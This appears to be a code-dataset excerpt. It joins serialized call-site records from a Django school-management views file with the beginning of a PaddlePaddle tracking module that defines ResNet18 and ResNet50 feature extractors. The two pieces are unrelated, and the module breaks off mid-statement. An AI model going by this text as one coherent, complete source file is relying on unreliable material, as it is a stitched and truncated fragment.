user_passes_test\n'), ((280, 1, 280, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((281, 1, 281, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(281, 18, 281, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((293, 1, 293, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((294, 1, 294, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(294, 18, 294, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((299, 1, 299, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((300, 1, 300, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(300, 18, 300, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((327, 1, 327, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((328, 1, 328, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(328, 18, 328, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((334, 1, 334, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((335, 1, 335, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(335, 18, 335, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((344, 1, 344, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((345, 1, 345, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(345, 18, 345, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((354, 1, 354, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((355, 1, 355, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(355, 18, 355, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((378, 1, 378, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((379, 1, 379, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(379, 18, 379, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((385, 1, 385, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((386, 1, 386, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(386, 18, 386, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((394, 1, 394, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((395, 1, 395, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(395, 18, 395, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((406, 1, 406, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((407, 1, 407, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(407, 18, 407, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((412, 1, 412, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((413, 1, 413, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(413, 18, 413, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((437, 1, 437, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((438, 1, 438, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(438, 18, 438, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((462, 1, 462, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((463, 1, 463, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(463, 18, 463, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((468, 1, 468, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((469, 1, 469, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(469, 18, 469, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((482, 1, 482, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((483, 1, 483, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(483, 18, 483, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((503, 1, 503, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((504, 1, 504, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(504, 18, 504, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((518, 1, 518, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((519, 1, 519, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(519, 18, 519, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((524, 1, 524, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((525, 1, 525, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(525, 18, 525, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((548, 1, 548, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((549, 1, 549, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(549, 18, 549, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((566, 1, 566, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((567, 1, 567, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(567, 18, 567, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((588, 1, 588, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((589, 1, 589, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(589, 18, 589, 28): 'is_student'}, {}), '(is_student)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((603, 1, 603, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((604, 1, 604, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(604, 18, 604, 28): 'is_student'}, {}), '(is_student)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((11, 11, 11, 46), 'django.shortcuts.render', 'render', ({(11, 18, 11, 25): 'request', (11, 26, 11, 45): '"""school/index.html"""'}, {}), "(request, 'school/index.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((19, 11, 19, 51), 'django.shortcuts.render', 'render', ({(19, 18, 19, 25): 'request', (19, 26, 19, 50): '"""school/adminclick.html"""'}, {}), "(request, 'school/adminclick.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((26, 11, 26, 53), 'django.shortcuts.render', 'render', ({(26, 18, 26, 25): 'request', (26, 26, 26, 52): '"""school/teacherclick.html"""'}, {}), "(request, 'school/teacherclick.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((33, 11, 33, 53), 'django.shortcuts.render', 'render', ({(33, 18, 33, 25): 'request', (33, 26, 33, 52): '"""school/studentclick.html"""'}, {}), "(request, 'school/studentclick.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((53, 11, 53, 66), 'django.shortcuts.render', 'render', ({(53, 18, 53, 25): 'request', (53, 26, 53, 51): '"""school/adminsignup.html"""', (53, 52, 53, 65): "{'form': form}"}, {}), "(request, 'school/adminsignup.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((77, 11, 77, 69), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((99, 11, 99, 69), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((171, 11, 171, 71), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((184, 11, 184, 54), 'django.shortcuts.render', 'render', ({(184, 18, 184, 25): 'request', (184, 26, 184, 53): '"""school/admin_teacher.html"""'}, {}), "(request, 'school/admin_teacher.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((209, 11, 209, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((216, 11, 216, 81), 'django.shortcuts.render', 'render', ({(216, 18, 216, 25): 'request', (216, 26, 216, 58): '"""school/admin_view_teacher.html"""', (216, 59, 216, 80): "{'teachers': teachers}"}, {}), "(request, 'school/admin_view_teacher.html', {'teachers': teachers})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((223, 11, 223, 84), 'django.shortcuts.render', 'render', ({(223, 18, 223, 25): 'request', (223, 26, 223, 61): '"""school/admin_approve_teacher.html"""', (223, 62, 223, 83): "{'teachers': teachers}"}, {}), "(request, 'school/admin_approve_teacher.html', {'teachers': teachers})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((242, 11, 242, 44), 'django.shortcuts.redirect', 'redirect', ({(242, 20, 242, 43): '"""admin-approve-teacher"""'}, {}), "('admin-approve-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((252, 11, 252, 41), 'django.shortcuts.redirect', 'redirect', ({(252, 20, 252, 40): '"""admin-view-teacher"""'}, {}), "('admin-view-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((277, 11, 277, 76), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((284, 11, 284, 88), 'django.shortcuts.render', 'render', ({(284, 18, 284, 25): 'request', (284, 26, 284, 65): '"""school/admin_view_teacher_salary.html"""', (284, 66, 284, 87): "{'teachers': teachers}"}, {}), "(request, 'school/admin_view_teacher_salary.html', {'teachers': teachers}\n )", False, 'from django.shortcuts import render, redirect, reverse\n'), ((296, 11, 296, 54), 'django.shortcuts.render', 'render', ({(296, 18, 296, 25): 'request', (296, 26, 296, 53): '"""school/admin_student.html"""'}, {}), "(request, 'school/admin_student.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((324, 11, 324, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((331, 11, 331, 81), 'django.shortcuts.render', 'render', ({(331, 18, 331, 25): 'request', (331, 26, 331, 58): '"""school/admin_view_student.html"""', (331, 59, 331, 80): "{'students': students}"}, {}), "(request, 'school/admin_view_student.html', {'students': students})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((341, 11, 341, 41), 'django.shortcuts.redirect', 'redirect', ({(341, 20, 341, 40): '"""admin-view-student"""'}, {}), "('admin-view-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((351, 11, 351, 44), 'django.shortcuts.redirect', 'redirect', ({(351, 20, 351, 43): '"""admin-approve-student"""'}, {}), "('admin-approve-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((374, 11, 374, 76), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((382, 11, 382, 84), 'django.shortcuts.render', 'render', ({(382, 18, 382, 25): 'request', (382, 26, 382, 61): '"""school/admin_approve_student.html"""', (382, 62, 382, 83): "{'students': students}"}, {}), "(request, 'school/admin_approve_student.html', {'students': students})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((398, 11, 398, 85), 'django.shortcuts.render', 'render', ({(398, 18, 398, 25): 'request', (398, 26, 398, 62): '"""school/admin_view_student_fee.html"""', (398, 63, 398, 84): "{'students': students}"}, {}), "(request, 'school/admin_view_student_fee.html', {'students': students})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((409, 11, 409, 57), 'django.shortcuts.render', 'render', ({(409, 18, 409, 25): 'request', (409, 26, 409, 56): '"""school/admin_attendance.html"""'}, {}), "(request, 'school/admin_attendance.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((433, 11, 433, 98), 'django.shortcuts.render', 'render', ({(433, 18, 433, 25): 'request', (433, 26, 433, 61): '"""school/admin_take_attendance.html"""', (433, 62, 433, 97): "{'students': students, 'aform': aform}"}, {}), "(request, 'school/admin_take_attendance.html', {'students': students,\n 'aform': aform})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((451, 11, 451, 93), 'django.shortcuts.render', 'render', ({(451, 18, 451, 25): 'request', (451, 26, 451, 70): '"""school/admin_view_attendance_ask_date.html"""', (451, 71, 451, 92): "{'cl': cl, 'form': form}"}, {}), "(request, 'school/admin_view_attendance_ask_date.html', {'cl': cl,\n 'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((465, 11, 465, 50), 'django.shortcuts.render', 'render', ({(465, 18, 465, 25): 'request', (465, 26, 465, 49): '"""school/admin_fee.html"""'}, {}), "(request, 'school/admin_fee.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((472, 11, 472, 89), 'django.shortcuts.render', 'render', ({(472, 18, 472, 25): 'request', (472, 26, 472, 54): '"""school/admin_view_fee.html"""', (472, 55, 472, 88): "{'feedetails': feedetails, 'cl': cl}"}, {}), "(request, 'school/admin_view_fee.html', {'feedetails': feedetails,\n 'cl': cl})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((493, 11, 493, 67), 'django.shortcuts.render', 'render', ({(493, 18, 493, 25): 'request', (493, 26, 493, 52): '"""school/admin_notice.html"""', (493, 53, 493, 66): "{'form': form}"}, {}), "(request, 'school/admin_notice.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((514, 11, 514, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((521, 11, 521, 59), 'django.shortcuts.render', 'render', ({(521, 18, 521, 25): 'request', (521, 26, 521, 58): '"""school/teacher_attendance.html"""'}, {}), "(request, 'school/teacher_attendance.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((544, 11, 544, 100), 'django.shortcuts.render', 'render', ({(544, 18, 544, 25): 'request', (544, 26, 544, 63): '"""school/teacher_take_attendance.html"""', (544, 64, 544, 99): "{'students': students, 'aform': aform}"}, {}), "(request, 'school/teacher_take_attendance.html', {'students':\n students, 'aform': aform})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((562, 11, 562, 95), 'django.shortcuts.render', 'render', ({(562, 18, 562, 25): 'request', (562, 26, 562, 72): '"""school/teacher_view_attendance_ask_date.html"""', (562, 73, 562, 94): "{'cl': cl, 'form': form}"}, {}), "(request, 'school/teacher_view_attendance_ask_date.html', {'cl': cl,\n 'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((579, 11, 579, 69), 'django.shortcuts.render', 'render', ({(579, 18, 579, 25): 'request', (579, 26, 579, 54): '"""school/teacher_notice.html"""', (579, 55, 579, 68): "{'form': form}"}, {}), "(request, 'school/teacher_notice.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((599, 11, 599, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((617, 11, 617, 87), 'django.shortcuts.render', 'render', ({(617, 18, 617, 25): 'request', (617, 26, 617, 72): '"""school/student_view_attendance_ask_date.html"""', (617, 73, 617, 86): "{'form': form}"}, {}), "(request, 'school/student_view_attendance_ask_date.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((629, 11, 629, 48), 'django.shortcuts.render', 'render', ({(629, 18, 629, 25): 'request', (629, 26, 629, 47): '"""school/aboutus.html"""'}, {}), "(request, 'school/aboutus.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((641, 11, 641, 65), 'django.shortcuts.render', 'render', ({(641, 18, 641, 25): 'request', (641, 27, 641, 50): '"""school/contactus.html"""', (641, 52, 641, 64): "{'form': sub}"}, {}), "(request, 'school/contactus.html', {'form': sub})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((10, 15, 10, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(10, 36, 10, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((18, 15, 18, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(18, 36, 18, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((25, 15, 25, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(25, 36, 25, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((32, 15, 32, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(32, 36, 32, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((76, 15, 76, 51), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(76, 36, 76, 50): '"""studentlogin"""'}, {}), "('studentlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((98, 15, 98, 51), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(98, 36, 98, 50): '"""teacherlogin"""'}, {}), "('teacherlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((117, 15, 117, 42), 'django.shortcuts.redirect', 'redirect', ({(117, 24, 117, 41): '"""admin-dashboard"""'}, {}), "('admin-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((145, 76, 145, 89), 'django.db.models.Sum', 'Sum', ({(145, 80, 145, 88): '"""salary"""'}, {}), "('salary')", False, 'from django.db.models import Sum\n'), ((146, 84, 146, 97), 'django.db.models.Sum', 'Sum', ({(146, 88, 146, 96): '"""salary"""'}, {}), "('salary')", False, 'from django.db.models import Sum\n'), ((148, 73, 148, 93), 'django.db.models.Sum', 'Sum', (), '', False, 'from django.db.models import Sum\n'), ((149, 81, 149, 91), 'django.db.models.Sum', 'Sum', ({(149, 85, 149, 90): '"""fee"""'}, {}), "('fee')", False, 'from django.db.models import Sum\n'), ((208, 15, 208, 52), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(208, 36, 208, 51): '"""admin-teacher"""'}, {}), "('admin-teacher')", False, 'from django.http import HttpResponseRedirect\n'), ((232, 20, 232, 52), 'django.shortcuts.reverse', 'reverse', ({(232, 28, 232, 51): '"""admin-approve-teacher"""'}, {}), "('admin-approve-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((323, 15, 323, 52), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(323, 36, 323, 51): '"""admin-student"""'}, {}), "('admin-student')", False, 'from django.http import HttpResponseRedirect\n'), ((391, 20, 391, 52), 'django.shortcuts.reverse', 'reverse', ({(391, 28, 391, 51): '"""admin-approve-student"""'}, {}), "('admin-approve-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((49, 29, 49, 70), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((52, 19, 52, 53), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(52, 40, 52, 52): '"""adminlogin"""'}, {}), "('adminlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((73, 31, 73, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((95, 31, 95, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((205, 31, 205, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((276, 19, 276, 49), 'django.shortcuts.redirect', 'redirect', ({(276, 28, 276, 48): '"""admin-view-teacher"""'}, {}), "('admin-view-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((319, 31, 319, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((373, 19, 373, 49), 'django.shortcuts.redirect', 'redirect', ({(373, 28, 373, 48): '"""admin-view-student"""'}, {}), "('admin-view-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((430, 19, 430, 47), 'django.shortcuts.redirect', 'redirect', ({(430, 28, 430, 46): '"""admin-attendance"""'}, {}), "('admin-attendance')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((448, 19, 448, 113), 'django.shortcuts.render', 'render', ({(448, 26, 448, 33): 'request', (448, 34, 448, 74): '"""school/admin_view_attendance_page.html"""', (448, 75, 448, 112): "{'cl': cl, 'mylist': mylist, 'date': date}"}, {}), "(request, 'school/admin_view_attendance_page.html', {'cl': cl,\n 'mylist': mylist, 'date': date})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((492, 19, 492, 46), 'django.shortcuts.redirect', 'redirect', ({(492, 28, 492, 45): '"""admin-dashboard"""'}, {}), "('admin-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((541, 19, 541, 49), 'django.shortcuts.redirect', 'redirect', ({(541, 28, 541, 48): '"""teacher-attendance"""'}, {}), "('teacher-attendance')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((559, 19, 559, 115), 'django.shortcuts.render', 'render', ({(559, 26, 559, 33): 'request', (559, 34, 559, 76): '"""school/teacher_view_attendance_page.html"""', (559, 77, 559, 114): "{'cl': cl, 'mylist': mylist, 'date': date}"}, {}), "(request, 'school/teacher_view_attendance_page.html', {'cl': cl,\n 'mylist': mylist, 'date': date})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((576, 19, 576, 48), 'django.shortcuts.redirect', 'redirect', ({(576, 28, 576, 47): '"""teacher-dashboard"""'}, {}), "('teacher-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((614, 19, 614, 107), 'django.shortcuts.render', 'render', ({(614, 26, 614, 33): 'request', (614, 34, 614, 76): '"""school/student_view_attendance_page.html"""', (614, 77, 614, 106): "{'mylist': mylist, 'date': date}"}, {}), "(request, 'school/student_view_attendance_page.html', {'mylist':\n mylist, 'date': date})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((640, 19, 640, 66), 'django.shortcuts.render', 'render', ({(640, 26, 640, 33): 'request', (640, 35, 640, 65): '"""school/contactussuccess.html"""'}, {}), "(request, 'school/contactussuccess.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((121, 19, 121, 48), 'django.shortcuts.redirect', 'redirect', ({(121, 28, 121, 47): '"""teacher-dashboard"""'}, {}), "('teacher-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((123, 19, 123, 74), 'django.shortcuts.render', 'render', ({(123, 26, 123, 33): 'request', (123, 34, 123, 73): '"""school/teacher_wait_for_approval.html"""'}, {}), "(request, 'school/teacher_wait_for_approval.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((127, 19, 127, 48), 'django.shortcuts.redirect', 'redirect', ({(127, 28, 127, 47): '"""student-dashboard"""'}, {}), "('student-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((129, 19, 129, 74), 'django.shortcuts.render', 'render', ({(129, 26, 129, 33): 'request', (129, 34, 129, 73): '"""school/student_wait_for_approval.html"""'}, {}), "(request, 'school/student_wait_for_approval.html')", False, 'from django.shortcuts import render, redirect, reverse\n')]
weiwei1115/models
PaddleCV/tracking/pytracking/features/deep.py
e2c96c5f64b1dc8f0d5d9aa121300b87150e11e3
import os import numpy as np from paddle import fluid from ltr.models.bbreg.atom import atom_resnet50, atom_resnet18 from ltr.models.siamese.siam import siamfc_alexnet from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base from pytracking.admin.environment import env_settings from pytracking.features.featurebase import MultiFeatureBase from pytracking.libs import TensorList from pytracking.libs.paddle_utils import n2p class ResNet18(MultiFeatureBase): """ResNet18 feature. args: output_layers: List of layers to output. net_path: Relative or absolute net path (default should be fine). use_gpu: Use GPU or CPU. """ def __init__(self, output_layers=('block2', ), net_path='atom_iou', use_gpu=True, *args, **kwargs): super().__init__(*args, **kwargs) self.output_layers = list(output_layers) self.use_gpu = use_gpu self.net_path = net_path def initialize(self): with fluid.dygraph.guard(): if os.path.isabs(self.net_path): net_path_full = self.net_path else: net_path_full = os.path.join(env_settings().network_path, self.net_path) self.net = atom_resnet18( backbone_pretrained=False, backbone_is_test=True, iounet_is_test=True) state_dictsm, _ = fluid.load_dygraph(net_path_full) self.net.load_dict(state_dictsm) self.net.train() self.iou_predictor = self.net.bb_regressor self.layer_stride = { 'conv0': 2, 'conv1': 2, 'block0': 4, 'block1': 8, 'block2': 16, 'block3': 32, 'classification': 16, 'fc': None } self.layer_dim = { 'conv0': 64, 'conv1': 64, 'block0': 64, 'block1': 128, 'block2': 256, 'block3': 512, 'classification': 256, 'fc': None } self.iounet_feature_layers = self.net.bb_regressor_layer if isinstance(self.pool_stride, int) and self.pool_stride == 1: self.pool_stride = [1] * len(self.output_layers) self.feature_layers = sorted( list(set(self.output_layers + self.iounet_feature_layers))) self.mean = np.reshape([0.485, 0.456, 0.406], [1, -1, 1, 1]) self.std = np.reshape([0.229, 0.224, 0.225], [1, -1, 1, 1]) def free_memory(self): if hasattr(self, 'net'): del self.net if hasattr(self, 'iou_predictor'): del self.iou_predictor if hasattr(self, 'iounet_backbone_features'): del self.iounet_backbone_features if hasattr(self, 'iounet_features'): del self.iounet_features def dim(self): return TensorList([self.layer_dim[l] for l in self.output_layers]) def stride(self): return TensorList([ s * self.layer_stride[l] for l, s in zip(self.output_layers, self.pool_stride) ]) def extract(self, im: np.ndarray, debug_save_name=None): with fluid.dygraph.guard(): if debug_save_name is not None: np.savez(debug_save_name, im) im = im / 255. # don't use im /= 255. since we don't want to alter the input im -= self.mean im /= self.std im = n2p(im) output_features = self.net.extract_features(im, self.feature_layers) # Store the raw resnet features which are input to iounet iounet_backbone_features = TensorList([ output_features[layer] for layer in self.iounet_feature_layers ]) self.iounet_backbone_features = iounet_backbone_features.numpy() # Store the processed features from iounet, just before pooling self.iounet_features = TensorList([ f.numpy() for f in self.iou_predictor.get_iou_feat( iounet_backbone_features) ]) output = TensorList([ output_features[layer].numpy() for layer in self.output_layers ]) return output class ResNet50(MultiFeatureBase): """ResNet50 feature. args: output_layers: List of layers to output. net_path: Relative or absolute net path (default should be fine). use_gpu: Use GPU or CPU. """ def __init__(self, output_layers=('block2', ), net_path='atom_iou', use_gpu=True, *args, **kwargs): super().__init__(*args, **kwargs) self.output_layers = list(output_layers) self.use_gpu = use_gpu self.net_path = net_path def initialize(self): with fluid.dygraph.guard(): if os.path.isabs(self.net_path): net_path_full = self.net_path else: net_path_full = os.path.join(env_settings().network_path, self.net_path) self.net = atom_resnet50( backbone_pretrained=False, backbone_is_test=True, iounet_is_test=True) state_dictsm, _ = fluid.load_dygraph(net_path_full) self.net.load_dict(state_dictsm) self.net.train() self.iou_predictor = self.net.bb_regressor self.layer_stride = { 'conv0': 2, 'conv1': 2, 'block0': 4, 'block1': 8, 'block2': 16, 'block3': 32, 'classification': 16, 'fc': None } self.layer_dim = { 'conv0': 64, 'conv1': 64, 'block0': 256, 'block1': 512, 'block2': 1024, 'block3': 2048, 'classification': 256, 'fc': None } self.iounet_feature_layers = self.net.bb_regressor_layer if isinstance(self.pool_stride, int) and self.pool_stride == 1: self.pool_stride = [1] * len(self.output_layers) self.feature_layers = sorted( list(set(self.output_layers + self.iounet_feature_layers))) self.mean = np.reshape([0.485, 0.456, 0.406], [1, -1, 1, 1]) self.std = np.reshape([0.229, 0.224, 0.225], [1, -1, 1, 1]) def free_memory(self): if hasattr(self, 'net'): del self.net if hasattr(self, 'iou_predictor'): del self.iou_predictor if hasattr(self, 'iounet_backbone_features'): del self.iounet_backbone_features if hasattr(self, 'iounet_features'): del 